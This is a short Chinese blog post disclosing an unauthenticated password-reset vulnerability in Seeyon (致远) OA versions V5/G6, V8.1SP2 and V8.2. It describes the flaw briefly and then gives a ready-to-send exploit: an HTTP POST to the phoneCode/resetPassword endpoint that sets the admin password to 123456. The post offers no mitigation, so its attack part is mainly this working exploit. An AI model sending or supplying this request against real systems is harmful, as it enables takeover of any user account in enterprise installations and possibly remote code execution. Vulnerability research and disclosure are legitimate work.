0x01 前言
致远OA是一款协同管理平台,主要面向中大型、集团型企业和组织的协同管理软件产品。该漏洞是由于致远OA修改用户密码时收发验证码的接口存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行未授权重置密码攻击,最终导致越权可以任意用户登录账号并可能进一步实现远程代码执行。
0x02 漏洞影响
影响版本
- Seeyon OA=V5/G6
- Seeyon OA=V8.1SP2
- Seeyon OA=V8.2
0x03 漏洞利用
EXP:
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin","password":"123456"}
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容